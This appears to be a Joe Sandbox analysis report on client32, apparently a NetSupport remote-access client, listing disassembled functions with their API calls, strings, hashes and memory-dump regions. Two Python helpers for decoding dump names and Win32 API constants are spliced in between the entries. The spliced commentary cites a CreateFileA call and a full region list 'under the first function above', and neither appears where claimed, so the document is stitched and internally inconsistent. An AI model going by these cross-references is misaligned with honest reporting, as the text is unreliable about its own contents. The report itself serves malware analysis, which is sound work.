                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                • API String ID: 1843377891-2362500394
                                                                                • Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                                • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                • Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                                • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
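The dump names in the Memory Dump Source list above encode where each region of client32 came from. The following Python decodes them and the IDA-plugin snapshot name; it is an added example, not part of the Joe Sandbox report. The field layout it parses is an assumption inferred from the names on this page together with the snapshot name hcaresult_13_2_11000000_client32.jbxd (process id 13, dump round 2, base 0x11000000); the protection and type fields are read as the documented Win32 PAGE_* and MEM_* constants, which is consistent with a read-only header at 0x11000000, executable code at 0x11001000 and read/write data at 0x111E2000. The fifth and seventh fields are not explained on the page and are kept as raw values.

```python
"""Decode Joe Sandbox .sdmp dump names and the IDA-plugin snapshot name.

Added example; not part of the Joe Sandbox report. The field layout is an
ASSUMPTION inferred from the names on the page and from the snapshot name
hcaresult_13_2_11000000_client32.jbxd (pid 13, round 2, base 0x11000000).
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Documented winnt.h values for page protection and region type.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: pid.round.seq.base.protect.field5.type.field7.sdmp (hex, seq decimal).
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+)\.jbxd$")


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    dump_round: int
    base: int
    protect: int
    mem_type: int
    field5: int   # meaning not documented on the page; kept raw
    field7: int   # same

    @property
    def protect_name(self) -> str:
        # Low byte is the access class; 0x100/0x200/0x400 are modifier bits.
        name = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([name, *mods])

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* class

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE/WRITECOPY and their EXECUTE forms

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_sdmp(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    pid, rnd, _seq, base, prot, f5, mtype, f7 = m.groups()
    return DumpRegion(int(pid, 16), int(rnd, 16), int(base, 16), int(prot, 16),
                      int(mtype, 16), int(f5, 16), int(f7, 16))


def parse_snapshot(name: str) -> tuple[int, int, int, str]:
    """hcaresult_<pid>_<round>_<base>_<module>.jbxd -> (pid, round, base, module)."""
    m = SNAPSHOT_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised snapshot name: {name!r}")
    pid, rnd, base, module = m.groups()
    return int(pid), int(rnd), int(base, 16), module


def executable_regions(names: list[str]) -> list[int]:
    """Bases of the dumped regions that carry an execute protection."""
    return sorted(r.base for r in map(parse_sdmp, names) if r.executable)


def check_against_snapshot(names: list[str], snapshot: str) -> bool:
    """True when every dump belongs to the snapshot's pid and round and the
    module header region (base equal to the snapshot base) is among them."""
    pid, rnd, base, _ = parse_snapshot(snapshot)
    regions = [parse_sdmp(n) for n in names]
    return (all(r.pid == pid and r.dump_round == rnd for r in regions)
            and any(r.base == base for r in regions))


# Five of the names from this function's Memory Dump Source list.
REPORT_DUMPS = [
    "0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp",
    "0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp",
    "0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp",
    "0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp",
    "0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp",
]
SNAPSHOT = "hcaresult_13_2_11000000_client32.jbxd"

if __name__ == "__main__":
    for r in map(parse_sdmp, REPORT_DUMPS):
        print(f"pid={r.pid} base=0x{r.base:08X} {r.protect_name:<20} {r.type_name}")
    print("executable:", [f"0x{b:X}" for b in executable_regions(REPORT_DUMPS)])
    print("consistent with snapshot:", check_against_snapshot(REPORT_DUMPS, SNAPSHOT))
```

Run against the full list, only the 0x11001000 region is executable; that is the region the disassembly addresses in this report (0x1100xxxx to 0x1116xxxx) fall in, so it is the dump to load into IDA or Ghidra at base 0x11000000 when reproducing the function analysis. A name that does not match the assumed layout raises rather than silently misparsing.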
                                                                                APIs
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                • _fgets.LIBCMT ref: 1102BB10
                                                                                • _strtok.LIBCMT ref: 1102BB38
                                                                                  • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                                • _fgets.LIBCMT ref: 1102BB74
                                                                                • _strtok.LIBCMT ref: 1102BB88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: the same thirteen client32 dump regions (0x11000000 through 0x1132B000) listed under the first function above
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 78526175-1484737611
                                                                                • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BB0
                                                                                • LoadIconA.USER32(00000000,00007D0B), ref: 11027BC5
                                                                                • GetSystemMetrics.USER32(00000032), ref: 11027BDE
                                                                                • GetSystemMetrics.USER32(00000031), ref: 11027BE3
                                                                                • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027BF3
                                                                                • LoadIconA.USER32(11000000,00000491), ref: 11027C0B
                                                                                • GetSystemMetrics.USER32(00000032), ref: 11027C1A
                                                                                • GetSystemMetrics.USER32(00000031), ref: 11027C1F
                                                                                • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027C30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: the same thirteen client32 dump regions (0x11000000 through 0x1132B000) listed under the first function above
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                • String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
                                                                                • API String ID: 1946015-4092316048
                                                                                • Opcode ID: 7b6417ce7b3594b7669bd5d6d24d0fb252bf9abee04dc108a4f179c77e3cc1ac
                                                                                • Instruction ID: b61cf272041b3986789d5db62e37e05cd74fdd835a4c3c17a37838dc7586d827
                                                                                • Opcode Fuzzy Hash: 7b6417ce7b3594b7669bd5d6d24d0fb252bf9abee04dc108a4f179c77e3cc1ac
                                                                                • Instruction Fuzzy Hash: 4D51D8B5F4061A6BE711CBB08D81F6FB6ACAF54758F500469FA05E7680EB70E900C7A2
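The API lines in these function entries print argument values raw: 0xC0000000, 3 and 0x40000000 in the CreateFileA call on \\.\NSAudioFilter in the first function, 0x31 and 0x32 for GetSystemMetrics and 1 for LoadImageA here. The following Python parses the `API.DLL(args), ref: addr` line format and names those values using the documented Win32 constants. It is an added example and not part of the Joe Sandbox report. It assumes that the report prints stack slots beyond the API's real parameters (CreateFileA shows ten values for seven parameters), so only the first N slots of an N-parameter API are interpreted, and that `?` marks a slot the sandbox could not resolve; both are assumptions about the report format, and the decoder tables cover only the APIs on this page.

```python
"""Name the constants in Joe Sandbox 'API.DLL(args), ref: addr' lines.

Added example, not part of the report. Win32 values are the documented ones
(winnt.h, fileapi.h, winuser.h, libloaderapi.h). ASSUMPTION about the report
format: the argument list prints stack slots past the API's real parameters,
so only the first N slots of an N-parameter API are interpreted.
"""
from __future__ import annotations

import re

SUBCALL_RE = re.compile(r"^[•\s]*Part of subcall function ([0-9A-Fa-f]+):\s*")
LINE_RE = re.compile(
    r"^[•\s]*(?P<api>[\w:@]+)\.(?P<dll>[\w.]+)"      # CreateFileA.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                       # optional (arg,arg,...)
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")        # optional ", ref: addr"

ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x20000000: "FILE_FLAG_NO_BUFFERING", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x80: "FILE_ATTRIBUTE_NORMAL"}
SYSMETRIC = {0: "SM_CXSCREEN", 1: "SM_CYSCREEN", 11: "SM_CXICON", 12: "SM_CYICON",
             49: "SM_CXSMICON", 50: "SM_CYSMICON"}
IMAGE_TYPE = {0: "IMAGE_BITMAP", 1: "IMAGE_ICON", 2: "IMAGE_CURSOR"}
LOADLIB = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
           0x8: "LOAD_WITH_ALTERED_SEARCH_PATH"}


def decode_flags(value: int, table: dict[int, str]) -> str:
    """Split a bitmask into named flags; any unnamed remainder (or zero) stays hex."""
    names, rest = [], value
    for bit, name in table.items():
        if (value & bit) == bit:          # parenthesised: == binds tighter than &
            names.append(name)
            rest &= ~bit
    if rest or not names:
        names.append(f"0x{rest:X}")
    return "|".join(names)


# Parameter count and per-position decoders for the APIs that appear on the page.
DECODERS = {
    "CreateFileA": (7, {1: ("dwDesiredAccess", lambda v: decode_flags(v, ACCESS)),
                        2: ("dwShareMode", lambda v: decode_flags(v, SHARE)),
                        4: ("dwCreationDisposition", DISPOSITION.get),
                        5: ("dwFlagsAndAttributes", lambda v: decode_flags(v, FILE_FLAGS))}),
    "CreateEventA": (4, {1: ("bManualReset", bool), 2: ("bInitialState", bool)}),
    "GetSystemMetrics": (1, {0: ("nIndex", SYSMETRIC.get)}),
    "LoadImageA": (6, {2: ("uType", IMAGE_TYPE.get)}),
    "LoadLibraryExA": (3, {2: ("dwFlags", lambda v: decode_flags(v, LOADLIB))}),
}


def parse_slot(token: str):
    """'?' -> None, eight hex digits -> int, anything else -> the resolved string."""
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token


def decode_line(line: str) -> dict:
    line = line.strip()
    sub = SUBCALL_RE.match(line)
    if sub:
        line = line[sub.end():]
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    slots = [parse_slot(t) for t in m["args"].split(",")] if m["args"] else []
    nparams, decoders = DECODERS.get(m["api"], (len(slots), {}))
    params = slots[:nparams]
    decoded = {}
    for pos, (name, fn) in decoders.items():
        if pos < len(params) and isinstance(params[pos], int):
            value = fn(params[pos])
            decoded[name] = value if value is not None else f"0x{params[pos]:X}"
    return {"api": m["api"], "dll": m["dll"], "params": params, "extra": slots[nparams:],
            "decoded": decoded, "ref": m["ref"], "subcall": sub.group(1) if sub else None}


# Lines copied from this report (the first from the \\.\NSAudioFilter function).
SAMPLE_LINES = [
    r"• CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8",
    "• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F",
    "• GetSystemMetrics.USER32(00000031), ref: 11027BE3",
    "• LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027BF3",
    "• LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BB0",
    "  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29",
]

if __name__ == "__main__":
    for entry in map(decode_line, SAMPLE_LINES):
        print(entry["api"], entry["decoded"], "ref", entry["ref"])
```

Decoded, the first function's CreateFileA opens the \\.\NSAudioFilter device object (a `\\.\` name is a device, not a file) with GENERIC_READ|GENERIC_WRITE, no sharing, OPEN_EXISTING and FILE_FLAG_OVERLAPPED, which fits the CreateEventA(manual-reset) that follows it for overlapped completion; the strings show a separate Vista-and-later AudioCapture path when that device is not present. The GetSystemMetrics pair here resolves to SM_CXSMICON/SM_CYSMICON, the small-icon size handed to LoadImageA with IMAGE_ICON. Values outside the tables are left as hex rather than guessed.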
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                                • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                                • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                                • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                                • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                                • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                                • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: the same thirteen client32 dump regions (0x11000000 through 0x1132B000) listed under the first function above
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                • API String ID: 2439742961-1736626566
                                                                                • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                APIs
                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                • _free.LIBCMT ref: 1112131D
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _free.LIBCMT ref: 11121333
                                                                                • _free.LIBCMT ref: 11121348
                                                                                • GdiFlush.GDI32(?,?,?,012F8E30), ref: 11121350
                                                                                • _free.LIBCMT ref: 1112135D
                                                                                • _free.LIBCMT ref: 11121371
                                                                                • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                • DeleteObject.GDI32(?), ref: 1112139A
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,012F8E30), ref: 111213A4
                                                                                • DeleteDC.GDI32(?), ref: 111213CB
                                                                                • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                • DeleteDC.GDI32(?), ref: 111213EB
                                                                                • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                Strings
                                                                                • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: the same thirteen client32 dump regions (0x11000000 through 0x1132B000) listed under the first function above
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                • String ID: Error deleting membm, e=%d
                                                                                • API String ID: 3195047866-709490903
                                                                                • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,1B702977,?,?), ref: 11041F52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: the same thirteen client32 dump regions (0x11000000 through 0x1132B000) listed under the first function above
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                • API String ID: 3701541597-1781216912
                                                                                • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,1B702977,00000000,00000000,00000000), ref: 1103185A
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • EnumWindows.USER32(11030850,00000001), ref: 11031932
                                                                                • EnumWindows.USER32(11030850,00000000), ref: 1103198C
                                                                                • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 1103199C
                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 110319D3
                                                                                  • Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
                                                                                  • Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
                                                                                  • Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                  • Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
                                                                                  • Part of subcall function 11028450: CloseHandle.KERNEL32(?,00000000), ref: 11028545
                                                                                  • Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E
                                                                                • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 110319EB
                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 11031AA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                • API String ID: 3887438110-1852639040
                                                                                • Opcode ID: 0e329b33fc34c995a825831ad91e2baf469aabc71c50886a28b6731a55182f00
                                                                                • Instruction ID: e4a431c807ee13d88d7f5229128d7dd46b9a7d2a7c1cad66ff6ecfc7424b804f
                                                                                • Opcode Fuzzy Hash: 0e329b33fc34c995a825831ad91e2baf469aabc71c50886a28b6731a55182f00
                                                                                • Instruction Fuzzy Hash: 9D919D75E002299FDB14CF64CC80BEEF7F5AF89309F1441A9D9599B240EB31AE81CB91
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                • API String ID: 4172769820-2231854162
